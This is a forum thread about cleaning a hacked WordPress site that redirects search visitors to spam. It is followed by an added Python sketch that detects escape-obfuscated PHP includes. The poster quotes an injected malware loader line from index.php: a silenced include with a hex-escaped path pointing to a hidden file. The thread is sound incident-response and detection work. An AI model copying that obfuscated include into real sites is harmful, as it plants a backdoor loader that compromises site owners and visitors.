Hi, I don’t use WordPress too much but I’m trying to help un-fuck a friend’s site that has been hacked. If you search Google for the site and click the link that Google provides, it will intermittently redirect to a spam site. This hasn’t been reproduced when accessing the site directly. Doing some research, I have found an admin user named deleted-XXXXXXXXX (the Xs being random letters/numbers). Pretty sure this is the account created by the hacker. Question is now, how to proceed? Is it possible to see all the files that were modified by that suspicious user?
This is also near the top of index.php (including the weird escape characters):
@include /*gn7*/("/var/www/htm\x6c/wp\x2dinc\x6cudes/b\x6cocks/heading/.2a26f802.oti");
Does that look legit? Thinking not but I don’t have the familiarity to really say for sure.
​
There’s no point doing any investigating – site has been hacked and you need to remove the vulnerability and clean the malware. All WP malware is generally of the same type.
99% of the time, malware infections are the result of plugins not being updated or being abandoned, or of nulled plugins/themes being used.
Google “how to clean WordPress malware” – there are dozens of guides on how to do it. Essentially you’re deleting everything except /wp-content/uploads and reinstalling WordPress, the theme and plugins from a clean, known source (not backups). Most of the time it’s a fairly simple job.
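The include line quoted in the question hides its target behind PHP string escapes and an inline comment. As an added example (not code from anyone in this thread), the Python sketch below decodes such escapes and flags include/require targets that are escape-obfuscated, hidden, or not `.php` files; the function names are hypothetical and the sample input is constructed from the line in the post.

```python
import re
from pathlib import PurePosixPath

# PHP double-quoted string escapes: \xHH (hex) and \NNN (octal).
_ESC = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})')
_COMMENT = re.compile(r'/\*.*?\*/')
_INCLUDE = re.compile(
    r'(@?)\s*\b(include|require)(?:_once)?\b\s*\(?\s*"([^"]*)"')

def decode_php_escapes(literal):
    """Resolve \\xHH and octal escapes the way PHP does inside "..."."""
    def repl(m):
        code = int(m.group(1), 16) if m.group(1) else int(m.group(2), 8) & 0xFF
        return chr(code)
    return _ESC.sub(repl, literal)

def find_suspicious_includes(source):
    """Return (line_no, decoded_path, reasons) for include/require calls
    whose string target is escape-obfuscated or is not an ordinary .php file."""
    hits = []
    for no, line in enumerate(source.splitlines(), 1):
        # Drop inline /* ... */ comments used to break up the statement.
        m = _INCLUDE.search(_COMMENT.sub("", line))
        if not m:
            continue
        silenced, raw = m.group(1), m.group(3)
        path = decode_php_escapes(raw)
        name = PurePosixPath(path).name
        reasons = []
        if path != raw:
            reasons.append("escaped-path")
        if name.startswith("."):
            reasons.append("hidden-file")
        if not name.lower().endswith(".php"):
            reasons.append("non-php-target")
        if silenced and reasons:
            reasons.append("error-suppressed")  # leading @ hides PHP warnings
        if reasons:
            hits.append((no, path, reasons))
    return hits

# Constructed sample: the line from the post between ordinary index.php lines.
SAMPLE = r'''<?php
@include /*gn7*/("/var/www/htm\x6c/wp\x2dinc\x6cudes/b\x6cocks/heading/.2a26f802.oti");
define( 'WP_USE_THEMES', true );
require __DIR__ . '/wp-blog-header.php';
'''

if __name__ == "__main__":
    for no, path, reasons in find_suspicious_includes(SAMPLE):
        print(f"line {no}: {path}  [{', '.join(reasons)}]")
```

The decoded path shows where the included file sits on disk, so it can be inspected and removed along with the injected line.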